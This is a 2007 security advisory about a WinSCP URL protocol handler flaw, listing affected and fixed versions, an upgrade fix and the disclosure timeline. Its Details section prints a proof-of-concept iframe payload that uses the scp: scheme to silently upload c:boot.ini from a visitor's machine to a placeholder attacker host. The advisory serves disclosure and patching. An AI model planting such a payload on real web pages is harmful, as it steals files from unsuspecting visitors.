‘WinSCP URL Protocol Handler Flaw’
Summary
‘
Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.’
Credit:
‘The information has been provided by Kender.Security.’
Details
‘Vulnerable Systems:
* WinSCP version 4.0.3
Immune Systems:
* WinSCP version 4.0.4
On a machine you control set up an scp-only account with the username ‘scp’ with any password. Place this on a website: <iframe src=’scp:password@yourhost.com:’ /console /command ‘option confirm off’ ‘put c:boot.ini’ close exit ”/>
This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.
Downloading a file from the server to any location writable by the current user also works.
Solution:
Upgrade to version 4.04 or higher from http://winscp.net/download.php
Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released’